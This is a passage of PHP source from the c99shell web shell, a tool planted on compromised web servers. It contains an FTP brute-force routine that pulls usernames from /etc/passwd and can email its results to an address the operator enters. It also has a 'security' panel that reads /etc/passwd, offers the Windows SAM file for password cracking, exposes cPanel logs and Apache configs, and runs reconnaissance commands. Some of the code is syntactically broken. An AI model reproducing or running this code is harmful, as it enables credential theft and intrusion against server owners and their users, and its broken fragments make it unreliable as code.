"\" target=\"_blank\"><b>Connected to ".
$host.
" with login \"".
$login.
"\" and password \"".
$pass.
"\"</b></a>.<br>";
return TRUE;
}
}
}
{
if (!
is_numeric($fqb_lenght)) {$fqb_lenght =
$nixpwdperpage;
}
$fp =
fopen("/etc/passwd",
"r");
if (!
$fp) {echo "Can't get /etc/passwd for password-list.";
}
else
{
if ($fqb_logging)
{
if ($fqb_logfile) {$fqb_logfp =
fopen($fqb_logfile,
"w");
}
else {$fqb_logfp = FALSE;}
$fqb_log =
"FTP Quick Brute (called c99shell v. ".
$shver.
") started at ".
date("d.m.Y H:i:s").
"\r\n\r\n";
if ($fqb_logfile) {fwrite($fqb_logfp,
$fqb_log,
strlen($fqb_log));
}
}
$i = $success = 0;
$ftpquick_st = getmicrotime();
{
if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
{
echo "<b>Connected to ".
getenv("SERVER_NAME").
" with login \"".
$str[0].
"\" and password \"".
$str[0].
"\"</b><br>";
$fqb_log .=
"Connected to ".
getenv("SERVER_NAME").
" with login \"".
$str[0].
"\" and password \"".
$str[0].
"\", at ".
date("d.m.Y H:i:s").
"\r\n";
$success++;
}
if ($i > $fqb_lenght) {break;}
$i++;
}
if ($success ==
0) {echo "No success. connections!";
$fqb_log .=
"No success. connections!\r\n";
}
$ftpquick_t =
round(getmicrotime
()-
$ftpquick_st,
4);
echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".
$ftpquick_t.
"<br>Total connections: ".
$i.
"<br>Success.: <font color=green><b>".
$success.
"</b></font><br>Unsuccess.:".
($i-
$success).
"</b><br>Connects per second: ".
round($i/
$ftpquick_t,
2).
"<br>";
$fqb_log .=
"\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".
$ftpquick_t.
"\r\nTotal connections: ".
$i.
"\r\nSuccess.: ".
$success.
"\r\nUnsuccess.:".
($i-
$success).
"\r\nConnects per second: ".
round($i/
$ftpquick_t,
2).
"\r\n";
if ($fqb_logemail) {@
mail($fqb_logemail,
"c99shell v. ".
$shver.
" report",
$fqb_log);
}
}
}
else
{
$logfile =
$tmpdir_logs.
"c99sh_ftpquickbrute_".
date("d.m.Y_H_i_s").
".log";
$logfile =
str_replace("//",DIRECTORY_SEPARATOR,
$logfile);
echo "<form action=\"".
$surl.
"\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".
$nixpwdperpage.
"\"><br><br>Users only with shell? <input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging? <input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file? <input type=\"text\" name=\"fqb_logfile\" value=\"".
$logfile.
"\" size=\"".
(strlen($logfile)+2*
(strlen($logfile)/
10)).
"\"><br>Logging to e-mail? <input type=\"text\" name=\"fqb_logemail\" value=\"".
$log_email.
"\" size=\"".
(strlen($logemail)+2*
(strlen($logemail)/
10)).
"\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
}
}
}
if ($act == "d")
{
if (!
is_dir($d)) {echo "<center><b>Permision denied!</b></center>";
}
else
{
echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
if (!$win)
{
echo "<tr><td><b>Owner/Group</b></td><td> ";
$row[] =
($ow["name"]?
$ow["name"]:
fileowner($d)).
"/".
($gr["name"]?
$gr["name"]:
filegroup($d));
}
echo "<tr><td><b>Perms</b></td><td><a href=\"".
$surl.
"act=chmod&d=".
urlencode($d).
"\"><b>".view_perms_color
($d).
"</b></a><tr><td><b>Create time</b></td><td> ".
date("d/m/Y H:i:s",
filectime($d)).
"</td></tr><tr><td><b>Access time</b></td><td> ".
date("d/m/Y H:i:s",
fileatime($d)).
"</td></tr><tr><td><b>MODIFY time</b></td><td> ".
date("d/m/Y H:i:s",
filemtime($d)).
"</td></tr></table><br>";
}
}
if ($act == "security")
{
echo "<center><b>Server security information:</b></center><b>Open base dir: ".
$hopenbasedir.
"</b><br>";
if (!$win)
{
if ($nixpasswd)
{
if ($nixpasswd == 1) {$nixpasswd = 0;}
echo "<b>*nix /etc/passwd:</b><br>";
if (!
is_numeric($nixpwd_e)) {$nixpwd_e =
$nixpwdperpage;
}
echo "<form action=\"".
$surl.
"\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b> <input type=\"text=\" name=\"nixpwd_s\" value=\"".
$nixpwd_s.
"\"> <b>To:</b> <input type=\"text\" name=\"nixpwd_e\" value=\"".
$nixpwd_e.
"\"> <input type=submit value=\"View\"></form><br>";
$i = $nixpwd_s;
while ($i < $nixpwd_e)
{
if ($uid)
{
$uid["dir"] =
"<a href=\"".
$surl.
"act=ls&d=".
urlencode($uid["dir"]).
"\">".
$uid["dir"].
"</a>";
}
$i++;
}
}
else {echo "<br><a href=\"".
$surl.
"act=security&nixpasswd=1&d=".
$ud.
"\"><b><u>Get /etc/passwd</u></b></a><br>";
}
}
else
{
$v = $_SERVER["WINDIR"]."\repair\sam";
if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".
$v.
") </font></b><br>";
}
else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".
$surl.
"act=f&f=sam&d=".
$_SERVER["WINDIR"].
"\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";
}
}
if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".
$surl.
"act=f&f=userdomains&d=".
urlencode("/etc").
"&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";
}
if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".
$surl.
"act=f&f=accounting.log&d=".
urlencode("/var/cpanel/").
"\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";
}
if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".
$surl.
"act=f&f=httpd.conf&d=".
urlencode("/usr/local/apache/conf").
"&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";
}
if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".
$surl.
"act=f&f=httpd.conf&d=".
urlencode("/etc").
"&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";
}
if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".
$surl.
"act=f&f=syslog.conf&d=".
urlencode("/etc").
"&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";
}
if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".
$surl.
"act=f&f=motd&d=".
urlencode("/etc").
"&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";
}
if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".
$surl.
"act=f&f=hosts&d=".
urlencode("/etc").
"&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";
}
function displaysecinfo
($name,
$value) {if (!
empty($value)) {if (!
empty($name)) {$name =
"<b>".
$name.
" - </b>";
} echo $name.
nl2br($value).
"<br>";
}}
displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
displaysecinfo("RAM",myshellexec("free -m"));
displaysecinfo("HDD space",myshellexec("df -h"));
displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
displaysecinfo("Is cURL installed?",myshellexec("which curl"));
displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
displaysecinfo("Is links installed?",myshellexec("which links"));
displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
displaysecinfo("Is GET installed?",myshellexec("which GET"));
displaysecinfo("Is perl installed?",myshellexec("which perl"));
displaysecinfo("Where is apache",myshellexec("whereis apache"));
displaysecinfo("Where is perl?",myshellexec("whereis perl"));
displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
}
if ($act == "mkfile")
{
if ($mkfile != $d)
{
else {$act =
"f";
$d =
dirname($mkfile);
if (substr($d,
-1) != DIRECTORY_SEPARATOR
) {$d .= DIRECTORY_SEPARATOR;
} $f =
basename($mkfile);
}
}
else {$act = $dspact = "ls";}
}
if ($act == "encoder")
{
echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".
$surl.
"\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@
htmlspecialchars($encoder_input).
"</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
foreach(array("md5",
"crypt",
"sha1",
"crc32") as $v)
{
echo $v.
" - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".
$v($encoder_input).
"\" readonly><br>";
}
echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".
urlencode($encoder_input).
"\